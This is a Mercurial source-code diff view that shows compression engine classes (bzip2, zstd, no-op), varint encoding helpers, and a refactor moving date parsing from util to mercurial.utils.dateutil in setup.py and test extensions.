3957
3958 # We declare a protocol name but don't advertise by default because
3959 # it is slow.
3960 def wireprotosupport(self):
3961 return compewireprotosupport('bzip2', 0, 0)
3962
3963 def compressstream(self, it, opts=None):
3964 opts = opts or {}
3965 z = bz2.BZ2Compressor(opts.get('level', 9))
3966 for chunk in it:
3967 data = z.compress(chunk)
3968 if data:
3969 yield data
3970
3971 yield z.flush()
3972
3973 def decompressorreader(self, fh):
3974 def gen():
3975 d = bz2.BZ2Decompressor()
3976 for chunk in filechunkiter(fh):
3977 yield d.decompress(chunk)
3978
3979 return chunkbuffer(gen())
3980
3981 compengines.register(_bz2engine())
3982
3983 class _truncatedbz2engine(compressionengine):
3984 def name(self):
3985 return 'bz2truncated'
3986
3987 def bundletype(self):
3988 return None, '_truncatedBZ'
3989
3990 # We don't implement compressstream because it is hackily handled elsewhere.
3991
3992 def decompressorreader(self, fh):
3993 def gen():
3994 # The input stream doesn't have the 'BZ' header. So add it back.
3995 d = bz2.BZ2Decompressor()
3996 d.decompress('BZ')
3997 for chunk in filechunkiter(fh):
3998 yield d.decompress(chunk)
3999
4000 return chunkbuffer(gen())
4001
4002 compengines.register(_truncatedbz2engine())
4003
4004 class _noopengine(compressionengine):
4005 def name(self):
4006 return 'none'
4007
4008 def bundletype(self):
4009 """No compression is performed.
4010
4011 Use this compression engine to explicitly disable compression.
4012 """
4013 return 'none', 'UN'
4014
4015 # Clients always support uncompressed payloads. Servers don't because
4016 # unless you are on a fast network, uncompressed payloads can easily
4017 # saturate your network pipe.
4018 def wireprotosupport(self):
4019 return compewireprotosupport('none', 0, 10)
4020
4021 # We don't implement revlogheader because it is handled specially
4022 # in the revlog class.
4023
4024 def compressstream(self, it, opts=None):
4025 return it
4026
4027 def decompressorreader(self, fh):
4028 return fh
4029
4030 class nooprevlogcompressor(object):
4031 def compress(self, data):
4032 return None
4033
4034 def revlogcompressor(self, opts=None):
4035 return self.nooprevlogcompressor()
4036
4037 compengines.register(_noopengine())
4038
4039 class _zstdengine(compressionengine):
4040 def name(self):
4041 return 'zstd'
4042
4043 @propertycache
4044 def _module(self):
4045 # Not all installs have the zstd module available. So defer importing
4046 # until first access.
4047 try:
4048 from . import zstd
4049 # Force delayed import.
4050 zstd.__version__
4051 return zstd
4052 except ImportError:
4053 return None
4054
4055 def available(self):
4056 return bool(self._module)
4057
4058 def bundletype(self):
4059 """A modern compression algorithm that is fast and highly flexible.
4060
4061 Only supported by Mercurial 4.1 and newer clients.
4062
4063 With the default settings, zstd compression is both faster and yields
4064 better compression than ``gzip``. It also frequently yields better
4065 compression than ``bzip2`` while operating at much higher speeds.
4066
4067 If this engine is available and backwards compatibility is not a
4068 concern, it is likely the best available engine.
4069 """
4070 return 'zstd', 'ZS'
4071
4072 def wireprotosupport(self):
4073 return compewireprotosupport('zstd', 50, 50)
4074
4075 def revlogheader(self):
4076 return '\x28'
4077
4078 def compressstream(self, it, opts=None):
4079 opts = opts or {}
4080 # zstd level 3 is almost always significantly faster than zlib
4081 # while providing no worse compression. It strikes a good balance
4082 # between speed and compression.
4083 level = opts.get('level', 3)
4084
4085 zstd = self._module
4086 z = zstd.ZstdCompressor(level=level).compressobj()
4087 for chunk in it:
4088 data = z.compress(chunk)
4089 if data:
4090 yield data
4091
4092 yield z.flush()
4093
4094 def decompressorreader(self, fh):
4095 zstd = self._module
4096 dctx = zstd.ZstdDecompressor()
4097 return chunkbuffer(dctx.read_from(fh))
4098
4099 class zstdrevlogcompressor(object):
4100 def __init__(self, zstd, level=3):
4101 # Writing the content size adds a few bytes to the output. However,
4102 # it allows decompression to be more optimal since we can
4103 # pre-allocate a buffer to hold the result.
4104 self._cctx = zstd.ZstdCompressor(level=level,
4105 write_content_size=True)
4106 self._dctx = zstd.ZstdDecompressor()
4107 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4108 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4109
4110 def compress(self, data):
4111 insize = len(data)
4112 # Caller handles empty input case.
4113 assert insize > 0
4114
4115 if insize < 50:
4116 return None
4117
4118 elif insize <= 1000000:
4119 compressed = self._cctx.compress(data)
4120 if len(compressed) < insize:
4121 return compressed
4122 return None
4123 else:
4124 z = self._cctx.compressobj()
4125 chunks = []
4126 pos = 0
4127 while pos < insize:
4128 pos2 = pos + self._compinsize
4129 chunk = z.compress(data[pos:pos2])
4130 if chunk:
4131 chunks.append(chunk)
4132 pos = pos2
4133 chunks.append(z.flush())
4134
4135 if sum(map(len, chunks)) < insize:
4136 return ''.join(chunks)
4137 return None
4138
4139 def decompress(self, data):
4140 insize = len(data)
4141
4142 try:
4143 # This was measured to be faster than other streaming
4144 # decompressors.
4145 dobj = self._dctx.decompressobj()
4146 chunks = []
4147 pos = 0
4148 while pos < insize:
4149 pos2 = pos + self._decompinsize
4150 chunk = dobj.decompress(data[pos:pos2])
4151 if chunk:
4152 chunks.append(chunk)
4153 pos = pos2
4154 # Frame should be exhausted, so no finish() API.
4155
4156 return ''.join(chunks)
4157 except Exception as e:
4158 raise error.RevlogError(_('revlog decompress error: %s') %
4159 forcebytestr(e))
4160
4161 def revlogcompressor(self, opts=None):
4162 opts = opts or {}
4163 return self.zstdrevlogcompressor(self._module,
4164 level=opts.get('level', 3))
4165
4166 compengines.register(_zstdengine())
4167
4168 def bundlecompressiontopics():
4169 """Obtains a list of available bundle compressions for use in help."""
4170 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4171 items = {}
4172
4173 # We need to format the docstring. So use a dummy object/type to hold it
4174 # rather than mutating the original.
4175 class docobject(object):
4176 pass
4177
4178 for name in compengines:
4179 engine = compengines[name]
4180
4181 if not engine.available():
4182 continue
4183
4184 bt = engine.bundletype()
4185 if not bt or not bt[0]:
4186 continue
4187
4188 doc = pycompat.sysstr('``%s``\n %s') % (
4189 bt[0], engine.bundletype.__doc__)
4190
4191 value = docobject()
4192 value.__doc__ = doc
4193 value._origdoc = engine.bundletype.__doc__
4194 value._origfunc = engine.bundletype
4195
4196 items[bt[0]] = value
4197
4198 return items
4199
4200 i18nfunctions = bundlecompressiontopics().values()
4201
4202 # convenient shortcut
4203 dst = debugstacktrace
4204
4205 def safename(f, tag, ctx, others=None):
4206 """
4207 Generate a name that it is safe to rename f to in the given context.
4208
4209 f: filename to rename
4210 tag: a string tag that will be included in the new name
4211 ctx: a context, in which the new name must not exist
4212 others: a set of other filenames that the new name must not be in
4213
4214 Returns a file name of the form oldname~tag[~number] which does not exist
4215 in the provided context and is not in the set of other names.
4216 """
4217 if others is None:
4218 others = set()
4219
4220 fn = '%s~%s' % (f, tag)
4221 if fn not in ctx and fn not in others:
4222 return fn
4223 for n in itertools.count(1):
4224 fn = '%s~%s~%s' % (f, tag, n)
4225 if fn not in ctx and fn not in others:
4226 return fn
4227
4228 def readexactly(stream, n):
4229 '''read n bytes from stream.read and abort if less was available'''
4230 s = stream.read(n)
4231 if len(s) < n:
4232 raise error.Abort(_("stream ended unexpectedly"
4233 " (got %d bytes, expected %d)")
4234 % (len(s), n))
4235 return s
4236
4237 def uvarintencode(value):
4238 """Encode an unsigned integer value to a varint.
4239
4240 A varint is a variable length integer of 1 or more bytes. Each byte
4241 except the last has the most significant bit set. The lower 7 bits of
4242 each byte store the 2's complement representation, least significant group
4243 first.
4244
4245 >>> uvarintencode(0)
4246 '\\x00'
4247 >>> uvarintencode(1)
4248 '\\x01'
4249 >>> uvarintencode(127)
4250 '\\x7f'
4251 >>> uvarintencode(1337)
4252 '\\xb9\\n'
4253 >>> uvarintencode(65536)
4254 '\\x80\\x80\\x04'
4255 >>> uvarintencode(-1)
4256 Traceback (most recent call last):
4257 ...
4258 ProgrammingError: negative value for uvarint: -1
4259 """
4260 if value < 0:
4261 raise error.ProgrammingError('negative value for uvarint: %d'
4262 % value)
4263 bits = value & 0x7f
4264 value >>= 7
4265 bytes = []
4266 while value:
4267 bytes.append(pycompat.bytechr(0x80 | bits))
4268 bits = value & 0x7f
4269 value >>= 7
4270 bytes.append(pycompat.bytechr(bits))
4271
4272 return ''.join(bytes)
4273
4274 def uvarintdecodestream(fh):
4275 """Decode an unsigned variable length integer from a stream.
4276
4277 The passed argument is anything that has a ``.read(N)`` method.
4278
4279 >>> try:
4280 ... from StringIO import StringIO as BytesIO
4281 ... except ImportError:
4282 ... from io import BytesIO
4283 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4284 0
4285 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4286 1
4287 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4288 127
4289 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4290 1337
4291 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4292 65536
4293 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4294 Traceback (most recent call last):
4295 ...
4296 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4297 """
4298 result = 0
4299 shift = 0
4300 while True:
4301 byte = ord(readexactly(fh, 1))
4302 result |= ((byte & 0x7f) << shift)
4303 if not (byte & 0x80):
4304 return result
4305 shift += 7
@@ -809,6 +809,7 b" packages = ['mercurial',"
809 809 'mercurial.pure',
810 810 'mercurial.thirdparty',
811 811 'mercurial.thirdparty.attr',
812 'mercurial.utils',
812 813 'hgext', 'hgext.convert', 'hgext.fsmonitor',
813 814 'hgext.fsmonitor.pywatchman', 'hgext.highlight',
814 815 'hgext.largefiles', 'hgext.lfs', 'hgext.narrow',
@@ -13,8 +13,8 b' from mercurial import ('
13 13 extensions,
14 14 policy,
15 15 registrar,
16 util,
17 16 )
17 from mercurial.utils import dateutil
18 18
19 19 configtable = {}
20 20 configitem = registrar.configitem(configtable)
@@ -49,7 +49,7 b' def fakewrite(ui, func):'
49 49
50 50 # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between
51 51 # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy
52 fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
52 fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
53 53
54 54 orig_pack_dirstate = parsers.pack_dirstate
55 55 orig_dirstate_getfsnow = dirstate._getfsnow
@@ -7,8 +7,8 b' from mercurial import ('
7 7 extensions,
8 8 patch as patchmod,
9 9 registrar,
10 util,
11 10 )
11 from mercurial.utils import dateutil
12 12
13 13 configtable = {}
14 14 configitem = registrar.configitem(configtable)
@@ -30,7 +30,7 b' def internalpatch(orig, ui, repo, patcho'
30 30 if fakenow:
31 31 # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between
32 32 # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy
33 fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
33 fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
34 34 for f in files:
35 35 repo.wvfs.utime(f, (fakenow, fakenow))
36 36
@@ -4,6 +4,7 b' Tests for the journal extension; records'
4 4 > # mock out util.getuser() and util.makedate() to supply testable values
5 5 > import os
6 6 > from mercurial import util
7 > from mercurial.utils import dateutil
7 8 > def mockgetuser():
8 9 > return 'foobar'
9 10 >
@@ -19,7 +20,7 b' Tests for the journal extension; records'
19 20 > return (time, 0)
20 21 >
21 22 > util.getuser = mockgetuser
22 > util.makedate = mockmakedate
23 > dateutil.makedate = mockmakedate
23 24 > EOF
24 25
25 26 $ cat >> $HGRCPATH << EOF
General Comments 0
You need to be logged in to leave comments. Login now